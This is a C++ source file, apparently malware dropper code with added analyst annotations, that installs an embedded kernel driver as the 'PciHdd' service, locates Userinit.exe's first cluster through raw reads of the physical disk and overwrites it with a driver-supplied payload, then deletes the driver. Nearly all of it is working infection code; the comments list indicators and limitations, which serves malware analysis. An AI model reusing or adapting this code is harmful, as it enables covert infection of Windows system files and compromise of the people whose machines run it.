// Test.cpp : 定義控制臺應(yīng)用程序的入口點(diǎn)。
//
#include "stdafx.h"
//==============================================================================
#include <pshpack1.h>
// One 16-byte entry of the MBR partition table. Declared under pshpack1 so the
// layout matches the on-disk bytes exactly. WriteVirusToDisk only consumes
// entry [0] and only the active, PartitionType and StartLBA fields of it.
typedef struct _PARTITION_ENTRY
{
UCHAR active; // boot indicator; 0x80 = active/bootable (WriteVirusToDisk requires this on entry 0)
UCHAR StartHead; // starting head of the partition (CHS)
UCHAR StartSector; // bits 7-6: high 2 bits of the starting cylinder; bits 5-0: starting sector
UCHAR StartCylinder; // low 8 bits of the starting cylinder
UCHAR PartitionType; // partition type id; only the PARTITION_TYPE_* values defined below are accepted
UCHAR EndHead; // ending head of the partition (CHS)
UCHAR EndSector; // bits 7-6: high 2 bits of the ending cylinder; bits 5-0: ending sector
UCHAR EndCylinder; // low 8 bits of the ending cylinder
ULONG StartLBA; // first sector of the partition as an LBA; used to locate the volume boot sector
ULONG TotalSector; // partition size in sectors (not used by this program)
} PARTITION_ENTRY, *PPARTITION_ENTRY;
//==============================================================================
// Classic Master Boot Record layout: 446 bytes of boot code, four 16-byte
// partition entries and a 2-byte signature. With 1-byte packing (pshpack1
// above) sizeof == 512, so it can be overlaid directly on the 512-byte
// sector buffer WriteVirusToDisk reads from \\.\PhysicalDrive0.
typedef struct _MBR_SECTOR
{
UCHAR BootCode[446]; // legacy boot code (not inspected by this program)
PARTITION_ENTRY Partition[4]; // primary partition table; only [0] is used
USHORT Signature; // boot signature (not verified by this program)
} MBR_SECTOR, *PMBR_SECTOR;
//==============================================================================
// Leading part of a FAT/NTFS volume boot sector: jump + OEM name, then the
// BIOS Parameter Block. Only the prefix up to SectorsPerFAT32 is declared;
// the program overlays it on the 512-byte sector it reads at the partition's
// StartLBA. Fields actually consumed by WriteVirusToDisk: SectorsPerCluster,
// ReservedSectors and, for FAT32 only, NumberOfFATs / SectorsPerFAT32.
// BytesPerSector is never read: the program hard-codes 512 everywhere.
typedef struct _BBR_SECTOR
{
USHORT JmpCode; // 2-byte jump to the boot code
UCHAR NopCode; // 1-byte nop pad so that the jump occupies 3 bytes
UCHAR OEMName[8]; // 8-byte OEM name
// BPB (BIOS Parameter Block) starts here
USHORT BytesPerSector; // bytes per sector (512 1024 2048 4096)
UCHAR SectorsPerCluster; // sectors per cluster (1 2 4 8 16 32 64 128); bytes*sectors must not exceed 32K (max cluster size)
USHORT ReservedSectors; // reserved sectors counted from the first sector of the volume; must not be 0; typically 1 for FAT12/FAT16, 32 for FAT32
UCHAR NumberOfFATs; // number of FAT copies on the volume, normally 2 [NTFS does not use this field; must be 0]
USHORT RootEntries; // FAT12/FAT16: number of 32-byte root directory entries; FAT32: must be 0 [not used by NTFS]
USHORT NumberOfSectors16; // total sectors on the volume; may be 0, in which case NumberOfSectors32 must be non-zero; FAT32: must be 0 [not used by FAT32/NTFS]
UCHAR MediaDescriptor; // media type
USHORT SectorsPerFAT16; // sectors occupied by one FAT (FAT12/FAT16); FAT32: must be 0 [not used by FAT32/NTFS]
USHORT SectorsPerTrack; // sectors per track, for INT 13h geometry
USHORT HeadsPerCylinder; // heads per cylinder, for INT 13h geometry
ULONG HiddenSectors; // sectors preceding the partition that holds this FAT volume
ULONG NumberOfSectors32; // total sectors on the volume; FAT32: non-zero; FAT12/FAT16 use it when the count exceeds 65536 [not used by NTFS]
// EBPB (Extended BIOS Parameter Block) starts here
ULONG SectorsPerFAT32; // FAT32: size of one FAT in sectors (SectorsPerFAT16 must then be 0)
} BBR_SECTOR, *PBBR_SECTOR;
#include <poppack.h>
#define PARTITION_TYPE_NTFS 0x07
#define PARTITION_TYPE_FAT32 0x0B
#define PARTITION_TYPE_FAT32_LBA 0x0C
//==============================================================================
#define STR_SYSFILE_PATH TEXT("%SystemRoot%\\system32\\drivers\\pcihdd.sys")
#define STR_VIRFILE_PATH TEXT("%SystemRoot%\\System32\\Userinit.exe")
#define STR_DSKDEVICE_NAME TEXT("\\\\.\\PhysicalDrive0")
#define STR_HDDDEVICE_NAME TEXT("\\\\.\\PhysicalHardDisk0")
//==============================================================================
#define IOCTL_MYDEV_BASE 0xF000
#define IOCTL_MYDEV_Fun_0xF01 CTL_CODE(IOCTL_MYDEV_BASE, 0xF01, METHOD_BUFFERED, FILE_ANY_ACCESS)
//==============================================================================
// Drops the kernel driver carried as resource (type 1001, name 1001) of
// ModuleHandle to %SystemRoot%\system32\drivers\pcihdd.sys, registers it as
// the demand-start kernel service "PciHdd", starts it, and then deletes the
// .sys file again. Note that DeleteFile at FunExit01 is reached on the
// success path as well, so the driver image exists on disk only between the
// WriteFile and the StartService call.
//
// Analyst notes (annotation only, no functional change):
//   - Indicators: service name "PciHdd", path ...\drivers\pcihdd.sys, and a
//     resource of type 1001 / name 1001 in the dropper.
//   - Requires rights for OpenSCManager(SC_MANAGER_ALL_ACCESS), i.e. admin.
//   - If the first CreateService fails (e.g. "PciHdd" already exists), the
//     existing service is stopped, deleted and re-created once.
//   - StartService's return value is ignored, so a driver that fails to
//     start is not reported here; the caller only sees ERROR_SUCCESS.
//
// ModuleHandle: module carrying the driver resource (the dropper itself, see _tmain).
// Returns ERROR_SUCCESS, or the GetLastError() value of the first failing call.
DWORD InstallAndStartDriver(HMODULE ModuleHandle)
{
TCHAR filePath[MAX_PATH];
HANDLE fileHandle;
HRSRC hSysRes;
DWORD dwWritten;
DWORD dwSysLen;
PVOID lpSysBuf;
SC_HANDLE hSCManager;
SC_HANDLE hService;
SERVICE_STATUS sService;
DWORD errCode = ERROR_SUCCESS;
// Locate the embedded driver, expand the drop path, and create/truncate the target.
// NOTE(review): the HRSRC from FindResource is passed straight to LockResource with
// no LoadResource in between; whether that yields the resource bytes depends on the
// loader and cannot be confirmed from this file. Also, ExpandEnvironmentStrings takes
// a size in TCHARs while sizeof(filePath) is in bytes.
if(
(NULL == (hSysRes = FindResource(ModuleHandle, (LPCTSTR)1001, (LPCTSTR)1001)))
||
(0 == (dwSysLen = SizeofResource(ModuleHandle, hSysRes)))
||
(NULL == (lpSysBuf = LockResource(hSysRes)))
||
(0 == ExpandEnvironmentStrings(STR_SYSFILE_PATH, &filePath[0], sizeof(filePath)))
||
(INVALID_HANDLE_VALUE == (fileHandle = CreateFile(filePath, GENERIC_WRITE, 0, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL)))
)
{
errCode = GetLastError();
goto FunExit00;
}
// Write the driver image to disk and force it out to the volume.
if(
!WriteFile(fileHandle, lpSysBuf, dwSysLen, &dwWritten, NULL)
||
!SetEndOfFile(fileHandle)
||
!FlushFileBuffers(fileHandle)
)
{
errCode = GetLastError();
}
CloseHandle(fileHandle);
if(ERROR_SUCCESS != errCode)
{
goto FunExit01;
}
if(NULL == (hSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS)))
{
errCode = GetLastError();
goto FunExit01;
}
// Register the dropped file as a demand-start kernel driver service.
hService = CreateService(
hSCManager,
TEXT("PciHdd"),
TEXT("PciHdd"),
SERVICE_ALL_ACCESS,
SERVICE_KERNEL_DRIVER,
SERVICE_DEMAND_START,
SERVICE_ERROR_IGNORE,
filePath,
NULL,
NULL,
NULL,
NULL,
NULL
);
if(NULL != hService)
{
CloseServiceHandle(hService);
}
else
{
// Creation failed: assume a stale "PciHdd" exists, stop and delete it, then retry once.
if(NULL != (hService = OpenService(hSCManager, TEXT("PciHdd"), SERVICE_ALL_ACCESS)))
{
ControlService(hService, SERVICE_CONTROL_STOP, &sService);
DeleteService(hService);
CloseServiceHandle(hService);
}
hService = CreateService(
hSCManager,
TEXT("PciHdd"),
TEXT("PciHdd"),
SERVICE_ALL_ACCESS,
SERVICE_KERNEL_DRIVER,
SERVICE_DEMAND_START,
SERVICE_ERROR_IGNORE,
filePath,
NULL,
NULL,
NULL,
NULL,
NULL
);
if(NULL != hService)
{
CloseServiceHandle(hService);
}
else
{
errCode = GetLastError();
goto FunExit02;
}
}
// Load the driver. The StartService result is deliberately not checked.
if(NULL == (hService = OpenService(hSCManager, TEXT("PciHdd"), SERVICE_START)))
{
errCode = GetLastError();
goto FunExit02;
}
StartService(hService, 0, NULL);
CloseServiceHandle(hService);
FunExit02:
CloseServiceHandle(hSCManager);
FunExit01:
// Runs on both success and failure: the .sys image is removed from disk once loaded.
DeleteFile(filePath);
FunExit00:
return errCode;
}
//==============================================================================
// Cleanup counterpart of InstallAndStartDriver: stops and deletes the
// "PciHdd" service, then (unconditionally, on every exit path) deletes
// %SystemRoot%\system32\drivers\pcihdd.sys. Stop/delete results are not
// checked; only OpenSCManager/OpenService failures are reported.
//
// Returns ERROR_SUCCESS, or the GetLastError() value of the failing Open* call.
DWORD StopAndDeleteDriver(VOID)
{
TCHAR filePath[MAX_PATH];
SC_HANDLE hSCManager;
SC_HANDLE hService;
SERVICE_STATUS sService;
DWORD errCode = ERROR_SUCCESS;
if(NULL == (hSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS)))
{
errCode = GetLastError();
goto FunExit00;
}
if(NULL == (hService = OpenService(hSCManager, TEXT("PciHdd"), SERVICE_ALL_ACCESS)))
{
errCode = GetLastError();
goto FunExit01;
}
// Best-effort stop and unregister; return values are ignored.
ControlService(hService, SERVICE_CONTROL_STOP, &sService);
DeleteService(hService);
CloseServiceHandle(hService);
FunExit01:
CloseServiceHandle(hSCManager);
FunExit00:
// Reached on every path, so the dropped driver file is always removed.
ExpandEnvironmentStrings(STR_SYSFILE_PATH, &filePath[0], sizeof(filePath));
DeleteFile(filePath);
return errCode;
}
//==============================================================================
// Overwrites the on-disk data of the given file on the first partition of the
// first physical disk by writing raw sectors; the file itself is never opened
// for write.
//
// 1) FSCTL_GET_RETRIEVAL_POINTERS on the file yields its first extent (LCN).
//
// 2) The MBR of \\.\PhysicalDrive0 and the boot sector of its first partition
//    supply the partition start, reserved sectors, FAT sizes (FAT32 only) and
//    sectors per cluster, from which that LCN is turned into a byte offset.
//
// 3) The first 512 bytes obtained through ReadFile are compared with the
//    512 bytes read directly at the computed offset to confirm the address.
//
// Parameter:
//   VirusFile - full path of the file to overwrite
//
// Return value:
//   ERROR_SUCCESS on success; otherwise a GetLastError() value, or one of the
//   small negative codes (-1 .. -5, cast to DWORD) noted at each check below.
//==============================================================================
// Analyst annotation only; the code below is unchanged.
//
// Locates the first cluster of VirusFile on disk and overwrites that one
// cluster with data obtained from the helper driver, using raw writes to
// \\.\PhysicalDrive0. Because the target file is opened GENERIC_READ only and
// the write goes to the physical drive, the modification never passes through
// the file as a file-system object.
//
// Limitations visible in the code: first disk and partition [0] only; the
// partition must be marked active (0x80) and be FAT32 (0x0B/0x0C) or NTFS
// (0x07); a sector size of 512 is assumed; only Extents[0] is used and only
// SectorsPerCluster*512 bytes are written.
//
// Indicators: opens "\\.\PhysicalHardDisk0" (not a standard Windows device
// name; presumably created by the PciHdd driver - cannot confirm here),
// "\\.\PhysicalDrive0" for read/write, and sends custom IOCTL 0xF000/0xF01.
//
// VirusFile: full path of the file to overwrite.
// Returns ERROR_SUCCESS, a GetLastError() value, or (DWORD)-1..-5 as noted below.
DWORD WriteVirusToDisk(LPCTSTR VirusFile)
{
STARTING_VCN_INPUT_BUFFER iVcnBuf;
UCHAR oVcnBuf[272]; // RETRIEVAL_POINTERS_BUFFER plus room for a handful of extents
PRETRIEVAL_POINTERS_BUFFER lpVcnBuf;
DWORD dwVcnExtents;
LARGE_INTEGER startLcn;
PUCHAR lpClusterBuf;
DWORD dwClusterLen;
UCHAR dataBuf[512]; // first 512 bytes of the file, via ReadFile
UCHAR diskBuf[512]; // one raw sector from the physical drive
DWORD dataLen;
LARGE_INTEGER diskPos;
PPARTITION_ENTRY lpPartition;
ULONG dwPartitionStart;
ULONG dwPartitionType;
PBBR_SECTOR lpBootSector;
DWORD SectorsPerCluster;
HANDLE hHddDevice;
HANDLE hDskDevice;
HANDLE hVirusFile;
DWORD errCode = ERROR_SUCCESS;
// hHddDevice is only opened and later closed; nothing is read from it. Its
// successful open is effectively the check that the driver's device exists.
if(INVALID_HANDLE_VALUE == (hHddDevice = CreateFileA(STR_HDDDEVICE_NAME, GENERIC_READ, 0, NULL, OPEN_EXISTING, 0, NULL)))
{
errCode = GetLastError();
goto FunExit00;
}
// Open the target read-only, unbuffered, sharing read+write.
if(INVALID_HANDLE_VALUE == (hVirusFile = CreateFileA(VirusFile, GENERIC_READ, FILE_SHARE_READ|FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_FLAG_NO_BUFFERING, NULL)))
{
errCode = GetLastError();
goto FunExit01;
}
// Ask the file system where the file's clusters live (from VCN 0).
iVcnBuf.StartingVcn.QuadPart = 0;
RtlZeroMemory(oVcnBuf, sizeof(oVcnBuf));
if(!DeviceIoControl(hVirusFile, FSCTL_GET_RETRIEVAL_POINTERS, &iVcnBuf, sizeof(iVcnBuf), &oVcnBuf[0], sizeof(oVcnBuf), &dataLen, NULL))
{
errCode = GetLastError();
goto FunExit02;
}
lpVcnBuf = (PRETRIEVAL_POINTERS_BUFFER)&oVcnBuf[0];
dwVcnExtents = lpVcnBuf->ExtentCount;
startLcn = lpVcnBuf->Extents[0].Lcn; // read before the ExtentCount check; only extent 0 is ever used
if(!dwVcnExtents)
{
errCode = (ULONG)(-3); // no extents: file too small (resident/empty), cannot operate
goto FunExit02;
}
if(startLcn.QuadPart == -1)
{
errCode = (ULONG)(-4); // LCN -1: original author treats this as a compressed file, cannot operate
goto FunExit02;
}
// Reference copy of the first sector, used below to validate the computed address.
// NOTE(review): FILE_FLAG_NO_BUFFERING requires an aligned buffer and dataBuf is a
// plain stack array; the ReadFile result is not checked, so on failure dataBuf is
// uninitialized and the later comparison simply fails with -5.
ReadFile(hVirusFile, dataBuf, sizeof(dataBuf), &dataLen, NULL);
// Open the first physical disk for raw read/write.
if(INVALID_HANDLE_VALUE == (hDskDevice = CreateFileA(STR_DSKDEVICE_NAME, GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL)))
{
errCode = GetLastError();
goto FunExit02;
}
// Read the first sector of the disk (MBR). ReadFile result not checked.
SetFilePointer(hDskDevice, 0, NULL, FILE_BEGIN);
ReadFile(hDskDevice, diskBuf, sizeof(diskBuf), &dataLen, NULL);
lpPartition = &(((PMBR_SECTOR)&diskBuf[0])->Partition[0]);
if(lpPartition[0].active != 0x80)
{
errCode = (ULONG)(-1); // partition 0 is not the active (boot) partition
goto FunExit03;
}
dwPartitionType = lpPartition[0].PartitionType;
if(
dwPartitionType != PARTITION_TYPE_FAT32
&&
dwPartitionType != PARTITION_TYPE_FAT32_LBA
&&
dwPartitionType != PARTITION_TYPE_NTFS
)
{
errCode = (ULONG)(-2); // unsupported partition type
goto FunExit03;
}
dwPartitionStart = lpPartition[0].StartLBA;
diskPos.QuadPart = dwPartitionStart * 512; // 32-bit multiply (ULONG * int) before widening to 64 bits
// Read the first sector of the active partition (volume boot sector).
SetFilePointer(hDskDevice, diskPos.LowPart, &diskPos.HighPart, FILE_BEGIN);
ReadFile(hDskDevice, diskBuf, sizeof(diskBuf), &dataLen, NULL);
lpBootSector = (PBBR_SECTOR)&diskBuf[0];
SectorsPerCluster = lpBootSector->SectorsPerCluster;
// Convert the first LCN of the file into a byte offset on the physical disk:
//   partition start + reserved sectors [+ FAT area on FAT32] + LCN * sectors/cluster, times 512.
// For NTFS no FAT area is added; what ReservedSectors holds on NTFS is not established here.
diskPos.QuadPart = dwPartitionStart;
diskPos.QuadPart+= lpBootSector->ReservedSectors;
if(dwPartitionType == PARTITION_TYPE_FAT32 || dwPartitionType == PARTITION_TYPE_FAT32_LBA)
{
diskPos.QuadPart+= lpBootSector->NumberOfFATs * lpBootSector->SectorsPerFAT32;
}
diskPos.QuadPart+= startLcn.QuadPart * SectorsPerCluster;
diskPos.QuadPart*= 512;
// Validate the address: the raw sector at diskPos must equal the file's first 512 bytes.
SetFilePointer(hDskDevice, diskPos.LowPart, &diskPos.HighPart, FILE_BEGIN);
ReadFile(hDskDevice, diskBuf, sizeof(diskBuf), &dataLen, NULL);
if(!RtlEqualMemory(dataBuf, diskBuf, sizeof(diskBuf)))
{
errCode = (ULONG)(-5); // computed location does not match the file's data
goto FunExit03;
}
// Allocate a zeroed buffer holding exactly one cluster.
dwClusterLen = SectorsPerCluster*512;
lpClusterBuf = (PUCHAR)GlobalAlloc(GMEM_ZEROINIT, dwClusterLen); // buffer for one cluster
if(!lpClusterBuf)
{
errCode = GetLastError(); // allocation failed (the original comment here was a copy-paste of the -5 text)
goto FunExit03;
}
// Obtain the replacement cluster contents from the driver. Per the original
// comment the payload is "decoded from the SYS file's resource section"; the
// input buffer passed is this executable's own code section (0x00401000,
// 0x73E bytes, hard-coded by the author). The IOCTL is issued on hVirusFile,
// the handle to the target file, not on hHddDevice - presumably the driver
// intercepts it; that cannot be confirmed from this file.
if(!DeviceIoControl(
hVirusFile,
IOCTL_MYDEV_Fun_0xF01,
(PVOID)0x00401000, // start of this executable's code section (author: "don't know how to express this in C")
0x73E, // length of this executable's code section (same remark)
lpClusterBuf,
dwClusterLen,
&dataLen,
NULL
))
{
errCode = GetLastError();
goto FunExit04;
}
// Raw write of one cluster over the file's first cluster, then flush. Result not checked.
SetFilePointer(hDskDevice, diskPos.LowPart, &diskPos.HighPart, FILE_BEGIN);
WriteFile(hDskDevice, lpClusterBuf, dwClusterLen, &dataLen, NULL);
FlushFileBuffers(hDskDevice);
errCode = ERROR_SUCCESS;
FunExit04:
GlobalFree(lpClusterBuf);
FunExit03:
CloseHandle(hDskDevice);
FunExit02:
CloseHandle(hVirusFile);
FunExit01:
CloseHandle(hHddDevice);
FunExit00:
return errCode;
}
//==============================================================================
// Entry point: load the helper driver, overwrite
// %SystemRoot%\System32\Userinit.exe on disk via WriteVirusToDisk, then
// unload and delete the driver. Always returns 0. WriteVirusToDisk's result
// is discarded; only a driver-load failure is reported, via a MessageBox
// ("driver failed to load, the program cannot run").
// Indicators: STR_VIRFILE_PATH (Userinit.exe) as the target, the dialog text.
int _tmain(int argc, _TCHAR* argv[])
{
TCHAR filePath[MAX_PATH];
DWORD errCode;
// The driver resource is read from this very module.
if(ERROR_SUCCESS != (errCode = InstallAndStartDriver(GetModuleHandleA(NULL))))
{
MessageBox(NULL, TEXT("驅(qū)動程序的加載沒有成功,程序?qū)o法運(yùn)行"), NULL, MB_ICONERROR);
goto FunExit00;
}
ExpandEnvironmentStrings(STR_VIRFILE_PATH, &filePath[0], sizeof(filePath));
WriteVirusToDisk(filePath); // return value ignored
StopAndDeleteDriver();
FunExit00:
return 0;
}